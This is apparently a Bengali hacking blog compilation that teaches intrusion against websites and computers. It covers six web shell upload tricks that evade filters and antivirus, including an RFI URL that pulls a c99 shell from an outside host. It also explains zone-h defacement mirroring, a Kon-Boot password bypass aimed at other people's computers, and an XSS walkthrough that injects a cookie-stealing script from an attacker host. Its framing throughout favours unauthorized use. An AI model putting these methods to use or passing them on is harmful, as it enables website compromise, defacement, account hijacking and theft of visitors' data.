ওয়েবসাইট এ কিভাবে শেল আপলোড করবেন ?

প্রথম এ বলে নেই এটি একটি NFN (Not For Noobs) টিউটোরিয়াল । এটি বুঝতে হলে বেসিক হ্যাকিং জানা অত্যাবশ্যক । আমরা অনেক সময় ওয়েবসাইট এর অ্যাডমিন প্যানেল এ প্রবেশ করি এবং পি এইচ পি, এ এস পি , এ এস পি এক্স  ইত্যাদি  শেল আপলোড এর চেস্টা করি । কিন্তু দেখা যায় বিভিন্ন সমস্যা হয় । শেল আপলোড হয়না ... এন্টিভাইরাস ব্লক দেয় ইত্যাদি । অ্যাডমিন প্যানেল এ লগিন করার পর সহজেই আপলোড বাটন এর সাহায্যে শেল আপলোড দেয়া যায় । কিন্তু মাঝে মাঝে কিছু সমস্যা হতে পারে । তাই সহজ উপায় এ শেল আপলোড না হলে কিভাভে তাকে কাস্টোমাইজ করে আপলোড করা যায় তাই আপনাদেরকে বলব ।


প্রথম পদ্ধতি
আমরা জানি বেশিরভাগ শেল থাকে .php বাঃ .asp ফরমেটে । অনেক সময় অনেক ওয়েবসাইট সে ফরমেট গুলো সাপোর্ট করে না । এর সবথেকে সহজ সমাধান হল সেগুলকে রিনেম করা । মানে নামের শেষ এ .php এর পরে .jpg , .png , .doc এসব বসিয়ে দেয়া । তাতে অনেক সময় কাজ হয়ে যায় ।

দ্বিতীয় পদ্ধতি
দ্বিতীয় পদ্ধতি হল শেল আপ্লোডার আপলোড করে শেল আপলোড করুন । এমন শেল আপ্লোডার আপলোড করুন যেটি এন্টিভাইরাস বাঃ ফায়ার ওয়াল দ্বারা সনাক্ত হবে না । এরকম আপ্লোডার আপনি নেটে খুজলেই পাবেন ।

তৃতীয় পদ্ধতি
কিছু ফায়াওয়াল যেমন comodo firewall , encripted security শেল এর হেডার চেক করে ও সেই শেল কে ব্লক করে দেয় । তাই এ থেকে বাচার উপায় হচ্ছে notepad এ এডিট করতে শেল টি খুলুন আমরা একে GIF89A SHELL SCRIPT দ্বারা এডিট করব । এর জন্য শেল এর স্ক্রিপ্ট শুরু হবার আগে GIF89a; অ্যাড করে দিন । এরপর সেভ করে নিন ।

চতুর্থ পদ্ধতি
আপনার ফায়ার ফক্স ব্রাউযার এ LIVE HTTP HEADERS অ্যাড ওয়ান টি ইন্সটাল করে নিন ।
> এখন আপনার পি এইচ পি শেল এর নামের শেষ এ .jpg বাঃ .png অ্যাড করে নিন । মানে সেই সাইট এ যে ফাইল ফরমেট সাপোর্ট করে আরকি ।
> এখন সেই সাইটে শেল শেল আপলোড করে আপনার অ্যাড অন টি খুলুন । সেই পেজেই
> তাহলে আপনার live http header নিচের ছবির মত দেখাবে ।

> এরপর রিপ্লাই বাটন এ ক্লিক করার পর shell.php.jpg তে ক্লিক করুন ।
> তাহলে দেখবেন নতুন উইন্ডো ওপেন হবে । সেখানে দুটি বক্স থাকবে । আমাদের কাজ ২ নাম্বার টিকে নিয়ে ।
> এরপর দুই নাম্বার বক্স এ .jpg তুলে দিয়ে shell. php নামে রিনেম করুন ।
দেখুন আমরা সার্ভার কে প্রথমে দেখালাম আমরা ছবি আপলোড করছি । সে তাই মেনে নিল । এরপর এই অ্যাড অন কে দিয়ে আমরা সেই পেজ এডিট করে আমাদের শেল ইঞ্জেক্ট করে দিলাম ।

 পঞ্চম পদ্ধতি
উপরের চার টি পদ্ধতি কাজ করবে যখন আপনি আপলোড বাটন পাবেন । না পেলে ......... আপনাকে খুজতে হবে এডিট ইমেজ বাঃ এডিট আর্টিকেল নামে কিছু আছে কিনা । আপনাকে এটিও খেয়াল রাখতে হবে যে url এর শেষ এ .php ..asp এসব আছে কিনা । থাকলে সেই এডিট বাটনে ক্লিক করে সেখানে থাকা সবকিছু মুছে ফেলতে হবে । এরপর আপনার
শেল  কে নোটপ্যাড এ খুলে সেখান থেকে সব কোড কপি করে পেস্ট করে দিতে হবে । কিন্তু অবশ্যই খেয়াল রাখবেন যে সেই পেযে যেন php কোড এডিট করার অপসন থাকে । সেটা না হলে আপনার শেল এর স্ক্রিপ্ট কাজ করবে না ।

ষষ্ঠ পদ্ধতি

RFI Vulnerable সাইটে সাধারনত অন্যান্য ফ্রী হোস্টিং সাইটের মাদ্ধমে শেল আপলোড করতে হয় । এর জন্য
> আপনার শেল কে যে কোনও ফ্রী হোস্টিং সাইট যেমন http://www.110mb.com, ইত্যাদি সাইট এ আপলোড করুন ।
> ধরুন আপনার লিঙ্ক হল http://www.example.110mb.com/c99.txt এবং আপনার vulnerable সাইট এর লিঙ্ক হল http://www.abc.com . তাহলে শেল কে সাইট এ বসাতে কম্যান্ড টি হবে ।
http://www.abc .com/v2/index.php?page=http://www.example.110mb.com/c99.txt
> আপনি আপনার শেল ও সাইট এর নাম এখানে বসাবেন । এটি উদাহরন দেয়া হল । কিন্তু সাইট RFI VULNERABLE না হলে এটি কাজ করবে না


Happy Hacking ..........

 

মিরর যেভাবে করতে হয়

1.go to www.zone-h.com
2.click on notify
3.put ur deface page's address in Domain
4.in the box of Notificer " Here is Your Team Name "
5.click on submit.
6.click on onhold.
7.Find out ur defaced site from the list.
8.click on mirror.
9.The url of mirror page is the link of ur mirror. 


Happy Hacking :D

যে কোনো কম্পিউটার এ লগিন করুন এডমিন হিসেবে পাসওয়ার্ড ছাড়া |

আজকে আমি আপনাদের দেখাব কিভাবেপাসওয়ার্ড ছাড়া নিজের অথবা অন্য কারও computer open করবেন ।
এই কাজের জন্য আমাদের যা যা লাগবে
একটা pen drive .

এবং একটি comruter . (যদি নিজের কম্পিউটার এর password recover করতে হয় , সেক্ষেত্রে অন্যের computer use করতে হবে ।)
প্রথমে এ লিঙ্ক ক্লিক করে সফটওয়্যারটি download করে নিন ।

Multiboot USB Creator (Windows) | USB Pen Drive Linux
http://www.pendrivelinux.com/yumi-multiboot-usb-creator/

kon boot usb
 http://mediafire.com/?wxccd9b8v46gfwj
or
http://www.2shared.com/file/ZysdH7c4/KonBoot_V11_32__64_bit_USB_Onl.html


এখন YUMI-0.0.1.3.exe open করুন।

click on I Agree.

এখন আপনি আপনার pen drive এর letter সিলেক্ট করুন।
Format এর পাশের box এ টিক দিন ।
password crack করার জন্য আপনার pendrive পুরো Format করতে হবে ।
এখন step 2 হতে select a distribution from the following box to put on your usb এ kon-boot Floppy Image সিলেক্ট করুন এবং create button এ click করুন ।
কোন message আসলে yes করুন ।
আপনার অর্ধেক কাজ শেষ ।
এখন যে কম্পিউটার এর password ছাড়া খুলতে চান ,সে computer এর usb 2.0 port এ pen drive টি লাগান এবং computer চালু করুন ।এখন computer চালু হওয়ার সাথেসাথে bios setup এ যান । Bios setup থাকে advanced BIOS features থাকে First boot device এ removable সিলেক্ট করুন এবং save করে বের হন ।
এখন Computer restart হবে।এখন computer start হলে windows এর logo না এসে YUMI multiboot আসবে।এখন YUMI multiboot usb থাকে other operating systems and tools সিলেক্ট করুন।( default এর নিচে )
Kon boot সিলেক্ট করুন।
এরপর এখন Boot kon boot সিলেক্ট করুন।
এখন দেখবেন password ছাড়াই computer open হয়ে গেছে ।


Happy Hacling :D

XSS কি ?

XSS হ্যাকিং সম্পর্কে জানতে হলে প্রথমেই জানতে হবে XSS জিনিসটা কি? Cross site Scripting এর সংক্ষিপ্তরূপই হচ্ছে XSS এটাকে আবার CSS(Cascading Style sheet) ও বলে থাকে। যার যেভাবে ইচ্ছা সে ভাবে বলে। এটা Web Application Vulnerability এর সবচেয়ে জনপ্রিয় গুলোর একটি। এই vulnerability একজন হ্যাকারকে একটি সাইটে client side scripts (বিশেষ কিছু Javascript) ইনসার্ট করার অনুমতি প্রদান করেন। এই vulnerabilityদিয়ে একজন হ্যাকার ভিকটিমের সাইটে malicious codes, malware attack, phishing ইত্যাদি inject করাতে পারে।

XSS Vulnerability and Injection

ধাপ ১: Vulnerable ওয়েব সাইট খুঁজে বের করা

আপনে প্রথমে Vulnerable সাইট খুজে বের করুন । এজন্য সে প্রথমে Google এ যান। তারপর Google Dorks ব্যবহার করে Vulnerable সাইট খুজে বের করেন। তাহলে আপনি তার সাথে সার্চ দিন নিচের sql Injection দিয়ে। 

"search?q="

তাহলে আপনি অনেকগুলো Vulnerable সাইট খুজে পাবেন। এবার একটি সাইটে প্রবেশ করুন।

 

 

ধাপ ২: Vulnerability পরীক্ষা করা

এখন আমরা যে সাইটে প্রবেশ করেছি, সেই সাইটের Vulnerability পরীক্ষা করে দেখব। এজন্য আপনাকে প্রথমে উক্ত সাইটের এবটি পোষ্ট বা parameter খুঁজে বের করতে হবে। বুঝেছেন? না বুঝলে একটু অপেক্ষা করেন, বলছি। মানে আপনি এমন একটি পোষ্ট খুঁজে বের করবেন যা উক্ত সাইটের সার্ভার পাঠাবে। যেমনঃ search query, username, password.

Vulnerability পরীক্ষা করা জন্য দুটি পদ্ধতি আছে।

 

 

 

পদ্ধতি ১: প্রথম পদ্ধতি হল সাইটের মূল সার্চ বক্সে injection করা।

একজন হ্যাকার সাধারণত সাইটের মূল সার্চ বক্সে একটি malcious script লিখে, তারপর সার্চ বাটনে ক্লিক করে। সার্চ দেয়ার সাথে সাথে malcious script টি ওয়েবসাইটে কাজ করা শুরু করে দেয়।

 

 

 

 

পদ্ধতি ২: সাইটের URL এ injection  করা।

এটি কোন সার্চ বক্সে কাজ করে না। এটি শুধু মাত্র সাইটের URL এ কাজ করে থাকে। যেমনঃ-

htp://vulnerablewebsite/search?q=malicious_script_goes_here

পরীক্ষা করার সুবিধার্থে  input fields হিসেবে নিচের কোডটি দিন।

এবার উপরের কোডটি দিয়ে আপনি এবার পরীক্ষা করে দেখুন। যেমনঃ-

 

প্রথম পদ্ধতিঃ আপনি উপরের কোডটি আপনার ভিকটিমের সাইটের মূল সার্চ বক্সে লিখে সার্চ দেন।

 

দ্বিতীয় পদ্ধতিঃ আপনি ভিকটিমের সাইটের লিংকে লাগিয়ে এন্টার দিন। যেমনঃ-

 

http://vulnerablewebsite/search?q=

এবার যদি ‘extreme hacker’ লিখা একটি পপ আপ বক্স আসে। তাহলে বুঝবেন যে এই সাইটটি XSS এর জন্য vulnerable.

ধাপ ৩: Malicious Scripts দেয়া

Vulnerability পরীক্ষা করার পর একজন হ্যাকারের পরবর্তী কাজ হল, ভিকটিমের সাইটে malicious scripts ইঞ্জেকট করানো। এটি উক্তি সাইটের cookies চুরি করা এবং malware attack করতে সহযোগিতা করবে।

এখন মনে করুন হ্যাকারের সাইটে cookie stealing script টি আছে। তাহলে তার malicious script url হবে

http://attackerSite/malicious.js

এখন হ্যাকার তার malcious script টি vulnerable site এ inject  করতে পারবেন। তাহলে তার URL হবে

এরপর যখনই উক্ত সাইটের ভিজিটর উক্ত সাইটে ভিজিট করবে, তখনি malcious script টি কাজ শুরু করে দিবে এবং কুকি চুরি করা শুরু করে দিবে।

 

 

 

সাধারণত XSS এর ক্ষমতা অনুসারে persisting capability হয় দুই ধরনের। একটা হল Persistent আরেকটা হল Non-Persistent

Persistent XSS:

 

এটা হল সবচেয়ে বেশি ঝুঁকিপূর্ণ XSS vulnerability. এটা সরাসরি সার্ভার থেকেই ডাটা সমূহ সংরক্ষণ করে থাকে। তাই আপনি যখনই উক্ত সাইটে malicious script injection দিবেন, সাথে সাথে এটি ওয়েব এ্যাপ্লিকেশানে স্থায়ীভাবে সংরক্ষণ হয়ে যাবে। এটি অন্যন্যা সকল ভিজিটরকে এটা দেখিয়ে দিবে।  যদি আপনি আপনার ভিকটিমের ওয়েব সাইটে malicious script injection করবেন, তাহলে এটি উক্ত সাইটে আসা ভিজিটরদেরও আক্রান্ত করে। যেমনঃ-  কিছু কিছু সাইট আছে, যারা তাদের সাইটের ব্যবহারকারিদের ট্যাক করার জন্য search query গুলো সংরক্ষণ করে রাখে। যার ফলাফল XSS এর permanent storage. 

 

 

Non-Persistent XSS:

 

একে অনেকেই Reflected XSS বলে থাকে। এজন্যই malicious script এখানে টেম্পরারী। ফলে আপনার দেয়া স্ক্রীপ্টটি সাধারণ ভিজিটররা দেখতে পারবে না। তবে হ্যাঁ, যারা হ্যাকার তারা তাদের দেয়া স্ক্রীপ্টটি ভিজিটরদের দেখানোর জন্য injection টিপস ব্যবহার করে থাকে। মজার বিষয় হল, যারা উক্ত সাইটের যারা নিয়মিত ভিজিটর তারা কিন্তু মনে করে যে এটা সাইটের নিজের লিংক। ফলে তারা সেখানে যায় আর তারও উক্ত সাইটের হ্যাকিংয়ের শিকার হয়। যেমনঃ-  আপনি কিছু কিছু সাইটে যে কোন জিনিস সার্চ দিলে দেখবেন আপনাদের আপনার দেয়া সার্চ স্ট্রিংটি আপনাকে পুনরায় দেখাচ্ছে। এটার কারণেই malicious code temporarily .

 

একজন হ্যাকার এই Vulnerability দিয়ে কি করে ?

• পরিচয়পত্র ও বিভিন্ন গোপনীয় তথ্য চুরি করা।
• ওয়েব সাই্টের Bypassing restriction
• Session Hijacking
• Malware Attack
• Website Defacement
• Dos attacks

Happy Hacking :D